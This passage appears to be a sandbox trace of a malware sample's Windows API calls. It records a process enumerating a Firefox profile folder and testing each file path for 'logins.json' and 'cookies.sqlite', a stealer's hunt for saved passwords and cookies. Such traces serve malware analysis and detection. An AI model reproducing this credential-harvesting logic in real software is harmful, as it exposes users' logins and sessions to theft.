HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.211] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0160.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0160.211] lstrlenW (lpString="bookmarks-2017-06-05_5.json") returned 27 [0160.211] GetProcessHeap () returned 0x8e0000 [0160.211] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x925f68 [0160.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0160.211] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-05_5.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" [0160.211] VirtualQuery (in: lpAddress=0x925e88, lpBuffer=0x2df4a8, dwLength=0x1c | out: lpBuffer=0x2df4a8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.211] GetProcessHeap () returned 0x8e0000 [0160.211] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925e88 | out: hHeap=0x8e0000) returned 1 [0160.211] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json", lpSrch="logins.json") returned 0x0 [0160.212] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json", lpSrch="cookies.sqlite") returned 0x0 [0160.212] VirtualQuery (in: lpAddress=0x925f68, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.212] GetProcessHeap () returned 0x8e0000 [0160.212] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925f68 | out: hHeap=0x8e0000) returned 1 [0160.212] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85017d10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x85017d10, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85017d10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x54, dwReserved1=0x54, cFileName="bookmarks-2017-06-16_5.json", cAlternateFileName="BOOKMA~2.JSO")) returned 1 [0160.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0160.212] lstrlenW (lpString="\\") returned 1 [0160.212] GetProcessHeap () returned 0x8e0000 [0160.212] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x925e88 [0160.212] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0160.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0160.212] lstrlenW (lpString="bookmarks-2017-06-16_5.json") returned 27 [0160.212] GetProcessHeap () returned 0x8e0000 [0160.212] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x925f68 [0160.212] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0160.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-16_5.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" [0160.212] VirtualQuery (in: lpAddress=0x925e88, lpBuffer=0x2df4a8, dwLength=0x1c | out: lpBuffer=0x2df4a8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.212] GetProcessHeap () returned 0x8e0000 [0160.212] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925e88 | out: hHeap=0x8e0000) returned 1 [0160.212] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json", lpSrch="logins.json") returned 0x0 [0160.212] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json", lpSrch="cookies.sqlite") returned 0x0 [0160.212] VirtualQuery (in: lpAddress=0x925f68, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.212] GetProcessHeap () returned 0x8e0000 [0160.212] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925f68 | out: hHeap=0x8e0000) returned 1 [0160.212] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85017d10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x85017d10, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85017d10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x54, dwReserved1=0x54, cFileName="bookmarks-2017-06-16_5.json", cAlternateFileName="BOOKMA~2.JSO")) returned 0 [0160.212] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0160.213] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.213] GetProcessHeap () returned 0x8e0000 [0160.213] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.213] VirtualQuery (in: lpAddress=0x8fcf68, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.213] GetProcessHeap () returned 0x8e0000 [0160.213] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcf68 | out: hHeap=0x8e0000) returned 1 [0160.213] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.213] GetProcessHeap () returned 0x8e0000 [0160.213] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.213] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.213] lstrlenW (lpString="\\") returned 1 [0160.213] GetProcessHeap () returned 0x8e0000 [0160.214] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924da0 [0160.214] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.214] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.214] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.214] lstrlenW (lpString="bookmarkbackups") returned 15 [0160.214] GetProcessHeap () returned 0x8e0000 [0160.214] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0160.214] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.214] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.214] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.214] GetProcessHeap () returned 0x8e0000 [0160.214] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.214] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpSrch="logins.json") returned 0x0 [0160.214] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpSrch="cookies.sqlite") returned 0x0 [0160.214] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.214] GetProcessHeap () returned 0x8e0000 [0160.214] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.214] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb47c9bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb47c9bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x853f60d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="cert8.db", cAlternateFileName="")) returned 1 [0160.214] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.214] lstrlenW (lpString="\\") returned 1 [0160.214] GetProcessHeap () returned 0x8e0000 [0160.214] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924da0 [0160.214] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.214] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.214] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.214] lstrlenW (lpString="cert8.db") returned 8 [0160.214] GetProcessHeap () returned 0x8e0000 [0160.214] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x924e60 [0160.214] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.214] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cert8.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" [0160.214] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.214] GetProcessHeap () returned 0x8e0000 [0160.215] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.215] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db", lpSrch="logins.json") returned 0x0 [0160.215] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db", lpSrch="cookies.sqlite") returned 0x0 [0160.215] VirtualQuery (in: lpAddress=0x924e60, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.215] GetProcessHeap () returned 0x8e0000 [0160.215] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924e60 | out: hHeap=0x8e0000) returned 1 [0160.215] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80696ec0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="compatibility.ini", cAlternateFileName="COMPAT~1.INI")) returned 1 [0160.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.215] lstrlenW (lpString="\\") returned 1 [0160.215] GetProcessHeap () returned 0x8e0000 [0160.215] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924da0 [0160.215] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.215] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.215] lstrlenW (lpString="compatibility.ini") returned 17 [0160.215] GetProcessHeap () returned 0x8e0000 [0160.215] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x924e60 [0160.215] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.215] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="compatibility.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" [0160.215] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.215] GetProcessHeap () returned 0x8e0000 [0160.215] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.215] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini", lpSrch="logins.json") returned 0x0 [0160.215] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini", lpSrch="cookies.sqlite") returned 0x0 [0160.215] VirtualQuery (in: lpAddress=0x924e60, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.215] GetProcessHeap () returned 0x8e0000 [0160.215] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924e60 | out: hHeap=0x8e0000) returned 1 [0160.215] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5e8ce50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5e8ce50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb639bd10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x38000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="content-prefs.sqlite", cAlternateFileName="CONTEN~1.SQL")) returned 1 [0160.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.215] lstrlenW (lpString="\\") returned 1 [0160.215] GetProcessHeap () returned 0x8e0000 [0160.216] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924da0 [0160.216] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.216] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.216] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0160.216] GetProcessHeap () returned 0x8e0000 [0160.216] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x924e60 [0160.216] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.216] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="content-prefs.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" [0160.216] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.216] GetProcessHeap () returned 0x8e0000 [0160.216] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.216] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite", lpSrch="logins.json") returned 0x0 [0160.216] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0160.216] VirtualQuery (in: lpAddress=0x924e60, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x924000, AllocationBase=0x8e0000, 